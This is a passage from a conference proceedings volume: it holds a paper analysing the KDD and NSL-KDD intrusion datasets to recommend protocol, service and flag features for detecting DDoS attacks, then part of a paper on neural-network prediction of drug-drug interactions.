15. Adedeji, P. A., Akinlabi, S., Madushele, N., & Olatunji, O. O. (2020). Wind turbine power output
very short-term forecast: A comparative study of data clustering techniques in a PSO-ANFIS
model. Journal of Cleaner Production. https://doi.org/10.1016/j.jclepro.2020.120135
16. Zhang, X., Lin, Q., Mao, W., Liu, S., Dou, Z., & Liu, G. (2020). Hybrid particle Swarm and
Grey Wolf Optimizer and its application to clustering optimization. Applied Soft Computing.
https://doi.org/10.1016/j.asoc.2020.107061
17. Faisal, M., Hannan, M. A., Ker, P. J., Abd. Rahman, M. S., Begum, R. A., & Mahlia, T. M. I
(2020). Particle swarm optimised fuzzy controller for charging–discharging and scheduling of
battery energy storage system in MG applications. Energy Reports. https://doi.org/10.1016/j.
egyr.2020.12.007
Recommendations for DDOS
Attack-Based Intrusion Detection System
Through Data Analysis

Sagar Pande, Aditya Kamparia, and Deepak Gupta

Abstract As internet usage is increasing as the days are passing on, it is essential to
secure the network from intruders. So, it indicates the necessity of the construction
of an intrusion detection system. But one must know on which basis the intrusion
detection system (IDS) needs to be built. This thought dragged us to generate a new
idea of forming the recommendations which can act as a basis for the development of
IDS. In this paper, we have provided the recommendation by analyzing the standard
datasets, KDD, and NSL-KDD. For the analysis purpose, MS-Excel was utilized.

Keywords NSL-KDD · KDD · TCP · UDP · ICMP · Services · Flags

1 Introduction

Network security has become particularly relevant as computer networks have


become extensively utilized in all facets of our lives. The network needs to maintain
the security of the details of the user in terms of confidentiality, integrity, and avail-
ability. Any network that compromises any of the aspects of confidentiality, integrity,
and availability can be deemed as a network intrusion. The system which looks after
the trade-off of various aspects of the network or the intrusion of the network can
be deemed as an intruder detection system or IDS which is an integral component
of network protection systems. To decide if each packet has signs of interference,
an IDS normally tests both the transmitting packets of a given network. A well-
organized and structured IDS can recognize the features of most intrusion exercises
and automatically respond to those exercises by reporting or sending alerts to secu-
rity logs. Various types of IDS exist and these can be categorized into two based
on principle recognition methodologies such as misuse recognition and anomaly

S. Pande (B) · A. Kamparia


School of Computer Science and Engineering, Lovely Professional University, Punjab, India
D. Gupta
Department of Computer Science Engineering, Maharaja Agrasen Institute of Technology, New
Delhi, India
e-mail: deepakgupta@mait.ac.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 899
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_73
900 S. Pande et al.

recognition. Misuse recognition-based IDS mainly deals with knowledge identified


from the detection methodology and such kind of IDS needs to describe the features
or attributes of the intrusion and the rules clearly and stored them in a library, and
then by matching the scenarios with the existing rules the intrusion will be detected.
These IDSs can attain a very good accuracy along with less false alarm rate. It can
only detect the attacks that are in the library which implies that it cannot detect
the unknown threat. On the contrary, anomaly recognition-based IDS mainly deal
with the behavior identified from the detection methodology, and such kind of IDS
needs to define the normal activities of a network then identifies the current activities
has diverged from the normal activities or not. These IDS have only to describe the
normal state of activity of a certain network, without having the earlier knowledge
of various intrusion activities. Due to that, this type of IDS can be able to iden-
tify the unknown activities in the network which may lead to a higher false alarm
rate. Currently, the configuration of the network is becoming more complex, and
the pattern of sustainability and confusion is accompanied by intrusion approaches,
generating further difficulties for IDSs.
Through these IDSs, huge data can be collected from the network to identify the
various threats involved with the network. Various types of such threats exist with
the network; of those threats some of the popular threats for the network are DDOS,
pod, Smurf, and teardrop. The full form of DDOS is distributed denial-of-service,
and it is a threat for the network as the name indicates, this threat will deny the user
entering into the network by creating high traffic at the targeted server. Due to this,
the various components of the infrastructure will be exploited such as computers, and
the various network resources. A pod is a component that deals with the deployment
unit and addressability by having its IP address, and it can contain more than or equal
to a single container, usually one container. The attacks will be done on these pods
and steal the IP address and generate various messages from that IP address as if they
are coming from the proper server, and if the user trying to reach into a particular
pod, it will get denied as it is also a form of DDOS. A Smurf threat is a type of a
DDOS threat that makes inoperable computer networks. A program named under
the category of Smurf will lead this threat by depending on the two vital protocols
such as IP and ICMP and their vulnerabilities. Teardrop threat is also a type of a
DDOS threat that deals with the intruder sending a packet with mutated data to a
user’s computer, and the error arises due to that packet due to the performance of the
server reduces. Utilizing this scenario, the intruder exploits the data. It is considered
to be more effective based on the two vital protocols such as IP and TCP and their
vulnerabilities.
From the above discussion, one can understand that not only threats but also
protocols play an important role in an effective attack as well as exploitation. The
popular protocols of the network are TCP, IP, UDP, and ICMP. The full form of the
TCP protocol is transmission control protocol which plays a vital role in sending the
message from sender to receiver by dividing the message into the form of packets,
and these packets will get reassembled at the receiver’s end. The full form of IP
protocol is Internet protocol which is responsible for IP addressing and these will
direct the packets from sender to receiver. Most commonly, this protocol is utilized
Recommendations for DDOS Attack-Based Intrusion … 901

along with TCP. The full form of UDP is user datagram protocol which is considered
as a substitute for TCP in terms of communication protocol. This protocol majorly
concentrates on packet loss tolerance and low-latency linking among the various
applications. The full form of ICMP protocol is Internet control message protocol
which indeed a strengthening protocol of the IP suite. It is used to generate the
success or error report on the operational data when communicating two parties
through network devices such as routers.
The major contributions of the proposed framework deal with.
• Analyzing the various datasets such as KDD and NSL-KDD.
• Identifying the importance of NSL-KDD when compared with another mentioned
dataset.
• Analyzing the NSL-KDD thereby generating the recommendations which will be
helpful for further research.
The paper is organized into various sections such as Sect. 2 discusses the related
work based on the intrusion detection system and threats. Section 3 discusses the
analysis obtained from the considered dataset and thereby recommendations based
on that analysis. Section 4 discusses the conclusion related to DOS threats and normal
activities of the network.

2 Related Work

Ruan et al. [1] implemented the visualization of the popular data; KDD in the scenario
of the issues affected while analyzing big data with various characteristics of big data
such as volume, variety, and velocity. The sampling methodology, tabular weights,
and hash methodology were adopted to look in the depths of this dataset to recognize
the cluster with normal and other clusters with their corresponding attacks. Ji et al. [2]
identified the essentiality of IDS for the securitization of the user’s network. So, the
proposed work to classify the various attacks in IDS using the datasets such as KDD
and NSL-KDD with the aid of an artificial neural network. Through this proposed
work, able to achieve the accuracy overall but failed to achieve good accuracy while
classifying the various categories of attacks. Ibrahimi and Ouaddane [3] pointed out
the importance of IDS and also recognized that the major research was related to
machine learning held on the data collected through IDS to categorize the various
attacks in the dataset along with the category normal. The proposed framework was
held on the popular methodologies that are used for size reduction of big data such
as Linear Discriminant Analysis and Principle Component Analysis to identify the
anomalies that exist in the dataset NSL-KDD so that it will improve the conditions
to classify the various attacks. Othman et al. [4] have observed that the data collected
through IDS increasing in size as well as the number of features that gave an idea
to utilize the big data framework for classifying the various attacks. The proposed
framework utilized the spark framework as a big data framework, chi-square-selector
utilized for the selection of vital features from the big data, and a support vector
902 S. Pande et al.

machine utilized for the classification of attacks. The complete proposed framework
was based on the KDD dataset. Training time and time of prediction are very less in
the case of the proposed framework when compared to only the SVM framework or
only the logistic regression framework.
Jia et al. [5] proposed a framework based on a customized deep neural network
utilized to classify various attacks based on the datasets such as KDD and NSL-KDD
which are obtained through IDS. The customized deep neural network was framed
with four hidden-layers and though this framework was able to achieve an accuracy
of 99.9%. This article claims that this customized neural network can be used along
with IDS to improve the security of the network. Anand Sukumar et al. [6] proposed
a framework for the identification of the kind of attack through IDS with the aid
of a combination of genetic algorithm and K-Means methodology. It was imple-
mented on the dataset KDD99. Yet, the accuracy attained by the proposed model
is minimal and already there exist better models than this model. Basnet et al. [7]
explored the potential and efficiency of the deep learning methodology for the iden-
tification and classification of kinds of intrusion. It was implemented with the aid of
dataset, CSE-CIC-IDS2018, and able to achieve an accuracy of 99%. Kumar et al. [8]
proposed a unified model based on machine learning to integrate the IDS and IoT. The
inspiration for this proposed methodology by the identification that internet usage
affecting the devices communicating with the wireless network affects susceptibility
for various security attacks. This framework was implemented using the dataset
UNSW-NB15 and the proposed model had better accuracy attained with the other
two approaches such as ENADS and DENDRON. Khonde and Ulagamuthalvi [9]
mainly focused on the reduction of the number of features available in the standard
dataset, KDD99, and then the obtained data used for the classification of various
types of attacks. The classification was implemented using random forest method-
ology attained about 95% accuracy. Pawlicki et al. [10] discussed the potential to
degrade the efficiency by generating adverse attacks using four of the newly proposed
procedures, of an improved IDS during the testing phase, and provides a way of
detecting these threats. Both ANN and four approaches to render adverse attacks are
presented with the necessary context. The recent detection system is comprehensive
as well as the obtained findings were compared in five various classifiers. To the
utmost understanding, IDSs have not yet thoroughly studied the identification of
detrimental threats on ANN.
Ji and Li [11] suggested an IDS system based on the deep neural network with
the combination of FM methodology. It was implemented on the dataset KDD99 and
the accuracy attained through this framework about 93.4%. Su et al. [12] proposed
a deep learning-based IDS for the detection of various attacks on the network with
enhanced accuracy called BAT. This model is a combination of two mechanisms
such as bidirectional long short-term memory and attention mechanism which will
attain the vital attributes for the categorization of network traffic. Besides, attached
more convolutional layers for sample data processing with SoftMax activation func-
tion to attain the successful classification. This model enhanced the effectiveness of
recognizing anomalies that exist in the network. The dataset utilized was NSL-KDD
Recommendations for DDOS Attack-Based Intrusion … 903

for the implementation of the proposed model. Abrar et al. [13] compared the perfor-
mance of identification of threats in the network through various machine learning
methodologies based on the dataset NSL-KDD. Instead of using a complete dataset,
four sample datasets were derived from the main dataset and that was utilized for
the comparison aspects. Before deriving the various sample data, preprocessing was
applied for discarding the unnecessary features from the NSL-KDD. The proposed
work can be concluded that the random forest, extra tree classifier, and decision tree
methodologies are performing better than other machine learning methodologies.
Gao et al. [14] researched to generate an ensemble technique using machine learning
methodologies. The attained accuracy is promising but not at a good level. Through
this work, the authors gave a thought of going with ensembling methodologies was
appreciable. In this aspect, there is a high necessity for proper preprocessing as well as
attributes selection optimization of data. The proposed framework was implemented
through the NSL-KDD dataset. Aljawarneh et al. [15] implemented a proposed hybrid
model for classifying the threats in two different forms such as binary and multi-class
classification. Through the hybrid model able to attain an accuracy of 99.81% for the
binary classification and an accuracy of 98.56% for the multi-class classification. It
was implemented on the NSL-KDD dataset. The proposed model has two sections,
the first section deals with the filtering of attributes, and the second section deals
with the combination of various classifiers that would help classify the threats in the
network. Bhattacharjee et al. [16] employed an IDS model with a mixture of fuzzy
membership function was applied on the vectorized objective function along with a
genetic algorithm for the categorization of threats that exist in the network [17]. It
was implemented on the NSL-KDD dataset.
From the above discussion, one can understand that active research on the various
intrusion detection systems by classifying the various threats that exist in the network
is widely going on. Classification of these researches can be filtered using various
methodologies based on machine learning and deep learning methodologies [18].
The popular datasets utilized for this scenario are KDD and NSL-KDD. Still, there
is a necessity for the identification of a strong basis for the development of intrusion
detection systems [19]. For such a scenario, it is necessary to identify certain recom-
mendations based on the various threats, protocols, services, and flags. This aspect
is considered for the proposed framework.

3 Analysis

This section is organized into two subsections—the first subsection deals with the
discussion of the dataset and the analysis based on the dataset the second subsection
deals with the necessary recommendation to be produced based on the analysis made
on the considered dataset.
904 S. Pande et al.

3.1 Dataset and System Discussion

The dataset considered is the NSL-KDD dataset which is one of the popular datasets
while dealing with intrusion detection systems. That is the main reason to consider
this dataset and analyze the scenario of DDOS threat concerning various protocols
and its distribution concerning normal activities. This dataset consists of 42 features
developed based on 41 features such as protocol, threat, flag, duration, etc. The attacks
mentioned in this dataset can also be categorized into DDOS threat, Probe threat,
R2L (Root to Local) threat, U2R (User to Root) threat, and normal activities. The
analysis is done utilizing Office 365-MS Excel with the operating system Windows
10.
There are about two datasets that we have considered in this work and those
datasets are KDD and NSL-KDD. Again, NSL-KDD are extracted from the KDD
dataset. NSL-KDD dataset is extracted from KDD dataset about 20% of the entire
KDD dataset. NSL-KDD dataset was considered in terms of DDOS threats as well
as normal activities for analysis purpose. The DDOS class consists of various sub-
classes such as apache2, back, land, Neptune, mailbomb, pod, processtable, Smurf,
teardrop, udpstorm, and worm. The summary of the datasets such as KDD and NSL-
KDD are provided as mentioned in Table 1. The same information can be visualized
as mentioned in Fig. 1.
From Fig. 1, one can understand the major proportion of any dataset is normal
activities and DDOS threats. So, it is necessary to study and identify the consequences
caused due to DDOS threats to the network as well as the various components in the
network. Consider the proportion of DDOS threats and normal activities distribution
in each of these datasets. In the case of KDD, dataset consists of 391,458 DDOs
threats were identified, and NSL-KDD dataset consists of 45,927 DDOs threats
were identified as mentioned in Table 1. The only distribution of DDOS and normal
activities in the NSL-KDD and KDD datasets is represented as mentioned in Fig. 2a,
b, respectively.
From Fig. 2, one can understand the dataset NSL-KDD was very smaller when
compared with all other datasets, whereas KDDT dataset was a larger dataset.
Analyzing the former dataset is not at all good for network related issues, whereas
analyzing the later dataset is not at all possible with MS Excel due to its larger size.
So, NSL-KDD data is medium in size and the recommendations can be generalized
for a network. The distribution of DDOS and normal activities according to protocols
as per the dataset NSL-KDD percent is represented as mentioned in Fig. 3.

Table 1 Summary of the


Dataset Number of records
KDD and NSL-KDD datasets
Total Normal DDoS
KDD 488,735 97,277 391,458
NSL-KDD 113,270 67,343 45,927
Recommendations for DDOS Attack-Based Intrusion … 905

Fig. 1 Graphical comparison among the various forms of KDD datasets

Fig. 2 DDOS vs Normal activities distribution for NSL-KDD and KDD datasets

Fig. 3 Distribution of DDOS and normal activities in NSL-KDD dataset


906 S. Pande et al.

Fig. 4 The distribution of proportions of DDOS and normal activities in the KDD dataset

From Fig. 3, one can observe the distribution of DDOS and normal activities
across the protocols as per the dataset, NSL-KDD. The effect of DDOS threats can
be observed majorly in the case of TCP protocol followed by UDP, and finally the
least effect of DDOS in ICMP protocol. But these represent only the number of
cases in each of the protocols and the comparison would be more convenient when
we consider the proportion. The proportion is calculated as mentioned in Eq. (1).

Total number of cases registered under a class and a protocal


Proportionclass =
Total number of cases registered under a protocol
(1)

where class represents DDOS and normal activities and protocol represents TCP,
UDP, and ICMP. The proportions will provide the effectiveness of a class (DDOS or
Normal) in a particular protocol. The distribution of those proportions is represented
as mentioned in Fig. 4.
On the contrary to the discussed effect of DDOS on the protocols, the DDOS
effect was stronger in the case of both the ICMP and TCP protocols. In the case
of UDP, still, DDOS effect is very low which implies that the UDP protocol is
way better than the other two protocols. Similarly, let us consider the scenario in
which the classes (DDOS and normal) affect each of the flags by considering the
proportions. The distribution of DDOS and normal activities as per the various flags
in NSL-KDD is represented as mentioned in Fig. 5. From Fig. 5, one can understand
that DDOS affect higher in the case of flags such as S0, RSTO, and REJ. S0 flag
represents that the connection attempt was identified, yet there is no reply. RSTO flag
represents Originator resetting the connection, and REJ flag represents connection
attempt rejected.
Recommendations for DDOS Attack-Based Intrusion … 907

Fig. 5 Distribution of DDOS and normal activities as per the various flags in NSL-KDD

3.2 Recommendations

From the above-conducted analysis, certain recommendations were withdrawn as


per the protocols as follows. In the case of ICMP protocol, the level of attack was
at a medium level, and the services such as Eco_i and Urp_i are normal, but Ecr_i
is very crucial as mentioned in Table 2. In the case of TCP protocol, the level of
attack was at a medium level, and the services such as HTTP, SMTP, IRC, X11, and
FTP_data are normal and the flags such as SF and Src_byte are always normal, S0
is under maximum attack situation, and RSTO is under 80% of chances to be under
attack situation. As mentioned earlier, UDP is having very fewer chances of getting
attacked. These details can be more generalized as mentioned in Table 2. Similarly,
the analysis was also made on services as well as on the various flags and these were
mentioned in Tables 3 and 4, respectively.

Table 2 Analysis of protocol attack


S. Protocol_Type Attack/normal Service Flag Continuous
No
1 TCP Mix Private → Attack S0 → attack Src_byte → normal
Http → Normal
2 UDP Normal Private → Attack SF → attack Src_byte → Balanced
(94%) All Other →
Normal
3 ICMP Mix Ecr_i → Attack SF → attack Src_byte → attack
Tim_i → Attack
All other →
normal
908 S. Pande et al.

Table 3 Analysis of various


Service Attack/normal
services
Http Normal
Private Attack
Domain_u Normal
Smtp Normal
Ftp_data Normal

Table 4 Analysis of various


Flag Attack/normal Service
flags
SF Other all normal Ecr_i → attack
Private → attack
S0 Almost all attack http → attack
Private → attack
REJ Balanced Private → attack
RSTR Other all normal http → attack
RSTO Almost all attack Uccp → attack
Telnet → attack

4 Conclusion

The proposed framework mainly analyzed the KDD and NSL-KDD datasets to iden-
tify the influence of the DDOS attack on various aspects such as protocols, services,
and flags. The generalization would be more effective when the complete dataset is
considered. It would become a good and effective challenge for the big data scenario.
Due to these recommendations, the modeling of effective IDS based on DDOS attacks
can be framed. This analysis further can be continued for the effective recommen-
dations in very depth along with other classes of attacks such as the Probe attack,
R2L attack, and U2R attack. If able to identify the effective recommendations on all
these classes of attacks, then the most effective intrusion detection can be framed.

References

1. Ruan, Z., Miao, Y., Pan, L., Patterson, N., & Zhang, J. (2017). Visualization of big data security:
A case study on the KDD99 cup data set. Digital Communications and Networks, 3, 250–259.
2. Ji, H., Kim, D., Shin, D., & Shin, D. (2018). A study on comparison of KDD CUP 99 and NSL-
KDD using artificial neural network. Lecture Notes in Electrical Engineering, 474, 452–457.
3. Ibrahimi, K., & Ouaddane, M. (2017). Management of intrusion detection systems based-
KDD99: Analysis with LDA and PCA. In: International Conference on Wireless Networks and
Mobile Communications (WINCOM) 2017.
4. Othman, S. M., Ba-Alwi, F. M., Alsohybe, N. T., & Al-Hashida, A. Y. (2018). Intrusion detection
model using machine learning algorithm on Big Data environment. Journal of Big Data, 5.
Recommendations for DDOS Attack-Based Intrusion … 909

5. Jia, Y., Wang, M., & Wang, Y. (2019). Network intrusion detection algorithm based on deep
neural network. IET Information Security, 13, 48–53.
6. Anand Sukumar, J. V., Pranav, I., Neetish, M. M., & Narayanan, J. (2018). Network intrusion
detection using improved genetic k-means algorithm. In: 2018 International Conference on
Advances in Computing, Communications and Informatics (ICACCI), (pp. 2441–2446).
7. Basnet, R. B., Shash, R., Johnson, C., Walgren, L., & Doleck, T. (2019). Towards detecting
and classifying network intrusion traffic using deep learning frameworks. Journal of Internet
Services and Information Security, 9, 1–17.
8. Kumar, V., Das, A. K., & Sinha, D. (2019). UIDS: A unified intrusion detection system for IoT
environment. Evolutionary Intelligence.
9. Khonde, S., & Ulagamuthalvi, V. (209). Fusion of feature selection and random forest for
an anomaly-based intrusion detection system. Journal of Computational and Theoretical
Nanoscience, 16(209), 3603–3607.
10. Pawlicki, M., Choraś, M., & Kozik, R. (2020). Defending network intrusion detection systems
against adversarial evasion attacks. Future Generation Computer Systems, 110, 148–154.
11. Ji, Y., & Li, X. (2020). An efficient intrusion detection model based on deep FM. In Proceedings
on 2020 IEEE 4th Information Technology, Networking, Electronic and Automation Control
Conference ITNEC 2020 (pp. 778–783).
12. Su, T., Sun, H., Zhu, J., Wang, S., & Li, Y. (2020). BAT: Deep learning methods on network
intrusion detection using NSL-KDD dataset. IEEE Access, 8, 29575–29585.
13. Abrar, I., Ayub, Z., Masoodi, F., & Bamhdi, A. M. (2020). A machine learning approach for
intrusion detection system on NSL-KDD dataset (pp. 919–924).
14. Gao, X., Shan, C., Hu, C., Niu, Z., & Liu, Z. (2019). An adaptive ensemble machine learning
model for intrusion detection. IEEE Access, 7, 82512–82521.
15. Aljawarneh, S., Aldwairi, M., & Yassein, M. B. (2018). Anomaly-based intrusion detection
system through feature selection analysis and building hybrid efficient model. Journal of
Computer Science, 25(2018), 152–160.
16. Bhattacharjee, P. S., Fujail, A. K. M., & Begum, S. A. (2017). Intrusion detection system for
NSL-KDD data set using vectorised fitness function in genetic algorithm. The Advances in
Computational Sciences and Technology, 10(2017), 235–246.
17. Pande S., Khamparia A., Gupta D., & Thanh D. N. H. (2021) DDOS Detection using machine
learning technique. In A. Khanna, A. K. Singh, & A. Swaroop (Eds.), Recent studies on compu-
tational intelligence. Studies in computational intelligence (Vol. 921). Springer. https://doi.org/
10.1007/978-981-15-8469-5_5
18. Pande, S. D., & Khamparia, A. (2019). A review on detection of DDOS attack using machine
learning and deep learning techniques. Think India Journal, 2035–2043.
19. Pande, S., & Gadicha, A. B. (2015). Prevention mechanism on DDOS attacks by using multi-
level filtering of distributed firewalls. International Journal on Recent and Innovation Trends
in Computing and Communication, 3(3). ISSN: 2321-8169.
Drug-Drug Interaction Prediction Based
on Drug Similarity Matrix Using a Fully
Connected Neural Network

Alok Kumar and Moolchand Sharma

Abstract Drug-drug interactions (DDIs) are a major hindrance in providing safe and
inexpensive health care. It generally occurs for patients under extensive medication,
leading them to take multiple drugs at a time. DDI can cause side effects leading from
mild to severe health issues among the patients. This leads to reduce patients’ quality
of life and leads to an increase in hospital healthcare expenses by increasing their
recovery period. To resolve this problem, many efforts have been made to develop
new techniques for DDI prediction. In this article, we propose a method of predicting
DDI based on the similarity of drugs which includes chemical similarity, distance-
based similarity, side effects, ligand similarity, etc., using a fully connected neural
network model. Our model was able to achieve a competitive AUC score ranging
from 0.72 to 0.77 and PR AUC from 0.68 to 0.73 when tested on three gold standard
dataset in k-fold cross-validation.

Keywords Drug-drug interaction · Chemical similarity · Ligand similarity ·


AUC · Cross-validation

1 Introduction

Combining multiple drugs to treat severe diseases like cancer, AIDS, etc., is becoming
a promising and common approach in the modern era. The main reason behind using
multiple drugs to treat a disease is that it increases the treatment process’s efficacy,
and different drugs can tackle a different part of the treatment process [1]. However,
these combinations may result in unwanted interactions between the drugs, which can
cause adverse drug reactions [2]. Hence, the importance of predicting DDIs in human
health is immense [3]. Researchers and organizations worldwide have spent ample

A. Kumar
Goibibo Private Limited, Bangalore, India
M. Sharma (B)
Maharaja Agrasen Institute of Technology, Delhi, India
e-mail: moolchand@mait.ac.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 911
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_74
912 A. Kumar and M. Sharma

time and money to find DDI pairs using several In Vivo and In Vitro experimental
techniques [4]. The experimental method for determining DDI is extremely slow, thus
requiring a lot of time and money. These methods usually result in low throughput,
due to which some interactions may go unnoticed. As these procedures are extremely
slow and expensive, they are not feasible for finding large combinations of drugs.
Numerous new techniques for predicting DDI have come into the picture over the
decade to get over this problem.
Vilar et al. propose a protocol for predicting novel DDIs based on candidates’
similarity with the known DDIs [5]. A method to predict DDI by using model inter-
action profile fingerprints was proposed by Vilar et al. [6]. A small pool of 928 drugs
was considered in this approach, and their interaction profile fingerprints (IPFs) were
calculated. Then, a similarity matrix corresponding to the IPFs was generated using
the Jaccard index. To calculate predicted interactions established, DDI matrix was
multiplied with a similarity matrix.
Gottlieb et al. present a method to predict DDI considering the structural similarity
and side effects of known drug pairs [7]. Lee et al. propose a model to predict DDI
using a feed-forward deep neural network that takes reduced similarity profiles gener-
ated from autoencoders as input [8]. Cheng et al. created drug-drug similarity pairs
based on multiple features and applied five predictive models based on naive Bayes,
decision tree, k-nearest neighbor, logistic regression, and support vector machine
[9]. Zhang et al. proposed a method for finding DDI by applying a label propaga-
tion algorithm on a network of structural and side effect similarity of drugs [10].
A dependency-based convolutional neural network (DCNN) for predicting DDI is
proposed by Liu et al. [11]. In this model, DCNN was used to extract DDIs in short
sentences, and CNN-based model was implemented to extract DDIs in long distances
since most dependency-based parsers work well only for short sentences. A recur-
sive neural network-based model has been proposed by Lim et al. for predicting
DDIs [12]. The model uses a position feature, a subtree containment feature, and
an ensemble method to perform DDI extraction. In our model, we have proposed a
neural network-based model.
We have proposed a model made of a fully connected neural network to predict
this. Our model uses a similarity matrix as input for predicting the interaction proba-
bility proposed by Olayan [13]. He proposes a heuristic process to obtain an optimized
combination of similarities from the similarity set. The similarity matrix is made by
applying the heuristic algorithm on multiple similarities features like a side effect,
offside effect, pathway, ligand-based similarity, etc., to remove redundancy and find
the most optimal similarity subset. The subset obtained after this step is combined
to generate an integrated similarity matrix of m*m, where m is the number of drugs
taken into account. This combination was performed using the method of similarity
network fusion (SNF) [14]. This method constructs data samples’ networks for each
available data type and then combines them into a single network that represents the
complete spectrum of the given data type. Once the integrated similarity matrix is
generated, we feed it into our dense neural network. The network is very straightfor-
ward and simple, consisting of an input layer made up of 64 neurons—two hidden
Drug-Drug Interaction Prediction Based on Drug … 913

layers and an output layer containing two neurons for providing a binary output.
Details of the structure and working of the model are discussed in a later section.
We trained and tested our model on three gold standard datasets used in numerous
research works [7, 15–17]. Our model achieved a competitive AUC score ranging
from 0.72 to 0.77 and AUPR score from 0.68 to 0.73.
The key highlight of the paper includes:
• The following paper helps identify interactions between different kinds of drugs
during the process of multidrug treatment of a patient.
• A method to generate and combine similarity matrices of different drug features
has been discussed in this chapter.
• A four-layered neural network model has been proposed for predicting the
interaction probability of drugs.
• The model has achieved an AUC score ranging from 0.72 to 0.77 on three gold
standard datasets (DS1, DS2, DS3).

2 Dataset

To train and evaluate the performance of our model, we used three standard datasets.
These datasets contain a known DDI interaction matrix along with multiple other
Jaccard similarity matrices. The dataset used by us in this article has been taken
from [17]. The first dataset (DS1) consists of 548 drugs, and their interactions are
represented in a n*n matrix having a diagonal element as zero as the interaction of a
drug with itself is not taken into account. The dataset consists of similarity matrices
based on eight different characteristics (chemical similarity data, target data, enzyme
data, transporter data, pathway data, indication data, and side effect data).
The second dataset (DS2) consists of 707 drugs and their interaction matrices.
In total, this dataset contains 34,412 interactions. Unlike DS1, this dataset only has
interactions based on chemical similarity. The third dataset (DS3) consists of 807
drugs, and their interactions are represented in the form of interaction matrices.
This dataset consists of seven types of similarity matrices. Four of these similarities
are based on the anatomical therapeutic chemical (ATC) classification. The other
similarity matrices are based on chemical similarity, ligand-based similarity, and
side effects matrix. Gottlieb et al. have shown a general procedure for assembling
and validating these datasets [7].

2.1 Sources of Data

The datasets discussed above are created using data extracted from the following
sources.
914 A. Kumar and M. Sharma

1. DrugBank—DrugBank contains a vast amount of labeled drug data and a


comprehensive list of drug targets and drug action information. It has been
released in 2006 and has been used extensively to facilitate research involving
drug-target and drug-drug interactions [18].
2. KEGG— Kyoto Encyclopedia of Genes and Genomes (KEGG) is a knowledge
base(KB) for the structured study of gene functions. It contains a pathway
database that contains information regarding cellular processes represented in
the form of a graph [19].
3. OFFSIDES—A comprehensive database of drug effects [20].
4. PubChem—PubChem is an open-source knowledge base consisting of three
primary databases (BioAssay, Compound, and Substance). Information on a
broad range of chemical entities, including molecules, carbohydrates, lipid, and
amino acids, is present in this knowledge base [21].
5. SIDER—Side effect resource [SIDER] database of drugs and ADRs has been
created [22] to provide a complete picture for understanding the mechanism of
drugs’ actions and how they can cause adverse reactions. The latest version of
SIDER (SIDER 4) contains data on 1430 drugs. 5880 ADRs and 140,064 drug-
ADR pairs. Apart from this, SIDER also contains a dataset of drug indications
extracted using natural language processing. Just like DrugBank, SIDER has
also been extensively used in researches focusing on drug-target and drug-drug
interactions.

3 Methodology

This article has proposed a model for predicting DDI using a deep neural network,
taking an integrated similarity vector as input. Creating an integrated similarity matrix
has already been used in previous research works [13, 14]. A heuristic approach for
generating a subset of similarity matrices is proposed by Olayan, which takes care of
redundant data to generate the most optimal subset [13]. Then, the similarity network
fusion(SNF) [14] is applied to the subset to generate data sample networks combined
into a single network for generating an integrated similarity matrix. The vector of
similarity matrix and know interactions was provided as input for our fully connected
neural network. Our network consists of one input layer made of 64 neurons, and
an output layer made up of two neurons for generating binary output, and two fully
connected hidden layers connected sequentially. A dropout of 0.5 was applied in the
hidden layer to prevent overfitting. We used the relu activation function in all layers
except in the output layer, in which case the sigmoid activation function was used for
generating binary output. Our model used binary_crossentropy as the loss function
and adam as the optimizer. The model was trained on the DS1 dataset with a standard
test-train split of 70 and 30%. We found that our model gave better results during our
training process when trained on an integrated similarity matrix compared to when
trained just on chemical similarity. The hyperparameters of the model were tuned
Drug-Drug Interaction Prediction Based on Drug … 915

Table 1 Fully connected


Layer (type) Output Shape Param #
neural network summary
dense (Dense) (None, 64) 70,080
dropout (Dropout) (None, 64) 0
dense_1 (Dense) (None, 32) 2080
dropout_1 (Dropout) (None, 32) 0
dense_2 (Dense) (None, 16) 528
dropout_2 (Dropout) (None, 16) 0
dense_3 (Dense) (None, 2) 34

using tenfold cross-validation. The model’s summary and architecture are provided
in Table 1 and Fig. 1, respectively.

Fig. 1 Model architecture


916 A. Kumar and M. Sharma

4 Evaluation

Our model was trained on the DS1 dataset, which contains information on eight
different interactions. Our model was evaluated on four different evaluation metrics
(Area under the receiver operating characteristic curve (ROC AUC), Area under
the precision-recall curve (PR AUC). ROC [23] curve is generated by plotting true
positive rate (Tpr) against false positive rate (Fpr) is given below in Eqs. (1) and (2).
Equation (1) (Tpr) and Eq. (2) (Fpr)

Tp
Tpr = (1)
Tp + Fn

and
Fp
Fpr = (2)
Fp + Tn

where Tp = true positive, Tn = true negative, Fp = false positive, and Fn = false


negative.
Similarly, a precision-recall curve is generated by plotting precision against the
recall is shown below in Eqs. (3) and (4).
Equation (3) (Precision) and Eq. (4) (Recall)

Tp
Precision = (3)
Tp + Fp

and
Tp
Recall = (4)
Tp + Tn

5 Results and Discussion

In the experiment, we set the termination condition was set based on the AUC value.
We stopped the experiment once the AUC value peaked for our training dataset.
The DS1 dataset was chosen for training the model as it was the most wholesome,
containing similarity matrices based on eight different characteristics. To minimize
the chances of getting incurrate prediction scores, we tested our model on completely
different datasets than the one on which it was trained. We achieve this by performing
a test-train split of the DS1 dataset and introducing two new datasets DS2 and DS3.
Our result gave an AUC score of 0.75 for the test split of the DS1 dataset. This score
Drug-Drug Interaction Prediction Based on Drug … 917

Table 2 Performance
Dataset ROC AUC PR AUC
evaluation of the model on
different datasets DS1 0.75 0.73
DS2 0.72 0.70
DS3 0.77 0.68

Fig. 2 Performance evaluation graph for different datasets

rose to 0.77 for the test dataset DS3 and shown a slit dip to 0.72 for DS2, whereas
the PR AUC score ranged from 0.68 to 0.73. These results are shown in Table 2 and
represented as a bar graph in Fig. 2.

6 Conclusion and Future Scope

Side effects of drug-drug interaction is a big roadblock in the multidrug treatment


process. To know about these kinds of interactions in advance requires much exper-
imental work. More often than once, these experiments are extremely costly, slow
and provide very low throughput. This article has proposed a neural network-based
model to predict DDI using an integrated similarity matrix and know DDI interac-
tions as it is input. Using this model, we managed to achieve an accuracy based on
some other previously proposed models.
Although our model produced a very competitive result, there is still numerous
scope for improvement. The dataset used for training our model contains less than
